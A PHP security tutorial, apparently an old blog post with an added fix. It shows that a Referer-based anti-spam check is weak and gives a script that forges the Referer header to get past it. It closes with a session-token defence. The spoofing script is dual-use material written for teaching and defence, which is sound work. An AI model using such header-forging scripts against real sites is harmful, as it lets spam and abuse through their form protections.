How to bypass the REFERER security check


The HTTP Referer header is nothing more than the address of the page that linked the browser to the page it is now requesting.
If you are trying to "protect" a file by making sure that the Referer value (or any other variable passed by the browser) is your own website, that protection can be bypassed with the simple technique below. You cannot trust any variable passed by the browser.

Suppose you have a form that asks the user to enter a user name and a comment. The form sends the user input to, let's say, formprocess.php. In formprocess.php you check that the Referer is your site in order to prevent spam comments:

<?php
// Weak check: the Referer is supplied by the client and can be set to anything.
// (eregi() was removed in PHP 7; stripos() keeps the same case-insensitive substring match.)
$referer = $_SERVER['HTTP_REFERER'] ?? '';
if ( stripos( $referer, "www.mysite.com" ) !== false )
{
// do something
}
else
{
echo "Nice try";
}
?>

The problem here is that you are relying on a variable passed by the browser. An attacker can easily bypass your check by supplying your site as the Referer.

Look at this script:


<?php
// the site we want to attack
$host = "www.mysite.com";
// the file we want to attack
$file = "formprocess.php";

// the form fields, urlencoded exactly as a browser would send them
$body = "username=mustap&comment=NOCOMMENT";

// construct a header for our request
$hdrs = array( 'http' => array(
    'method'  => "POST",
    'header'  => "accept-language: en\r\n" .
                 "Host: $host\r\n" .
                 "Referer: http://$host\r\n" . // Setting the http-referer
                 "Content-Type: application/x-www-form-urlencoded\r\n" .
                 "Content-Length: " . strlen($body) . "\r\n",
    // the POST body goes in 'content', not at the end of the header string
    'content' => $body
) );

// get the requested page from the server
// with our header as a request-header
$context = stream_context_create($hdrs);
$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);
if ($fp === false) {
    die("request failed");
}
fpassthru($fp);
fclose($fp);
?>

Create a formprocess.php file and request it with this script; you will see that the if statement in formprocess.php is useless.
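The fix is to stop gating on anything the browser chooses to send and instead require something only your own server hands out. The following is an added example, not code from the original post: a single formprocess.php that renders the form on GET with a random per-session token in a hidden field, and on POST accepts the comment only when that token comes back. The spoofing script above never loads the form, so it never obtains a token. The file name formprocess.php is taken from the post; the token name form_token, the session-based storage and the one-shot (use-once) policy are assumptions of this example.

```php
<?php
// Added example (not from the original post): accept a comment only when the
// submission carries a secret token this server issued to the same session.
// Assumed: PHP sessions are available; the form and its processing live in this one file.
session_start();

// Issue a fresh random token, keep it server-side, and return it for the hidden field.
function issue_form_token(): string
{
    $token = bin2hex(random_bytes(32));          // 256 bits from a CSPRNG
    $_SESSION['form_token'] = $token;
    return $token;
}

// Validate the token that came back with the POST. One-shot: the stored token is
// cleared on first use, so a captured request cannot simply be replayed.
function check_form_token(?string $submitted): bool
{
    $expected = $_SESSION['form_token'] ?? null;
    unset($_SESSION['form_token']);
    if ($expected === null || $submitted === null) {
        return false;
    }
    return hash_equals($expected, $submitted);    // constant-time comparison
}

$self = basename($_SERVER['SCRIPT_NAME']);

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!check_form_token($_POST['form_token'] ?? null)) {
        http_response_code(403);
        echo "Nice try";
        exit;
    }
    // The Referer is still client-controlled: record it as a signal for later review,
    // but never let it decide whether the request is accepted.
    error_log("comment accepted, referer=" . ($_SERVER['HTTP_REFERER'] ?? '-'));
    $username = $_POST['username'] ?? '';
    $comment  = $_POST['comment'] ?? '';
    // do something with $username and $comment (store, moderate, ...)
    echo "Thanks, " . htmlspecialchars($username, ENT_QUOTES, 'UTF-8');
    exit;
}

// GET: render the form with the token embedded as a hidden field.
$token = issue_form_token();
?>
<form method="post" action="<?= htmlspecialchars($self, ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="form_token" value="<?= htmlspecialchars($token, ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="username">
  <textarea name="comment"></textarea>
  <button type="submit">Post comment</button>
</form>
```

The token is generated with random_bytes(), stored only in the server-side session, and compared with hash_equals() so that a wrong guess leaks no timing information. This defeats direct POSTs such as the script above and ties every submission to a browser session that actually loaded the form; a bot that fetches the form first can still obtain a token, so for spam specifically pair this with rate limiting or a challenge rather than treating the token alone as the anti-spam control.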
2010 WEBSITE20. All rights reserved.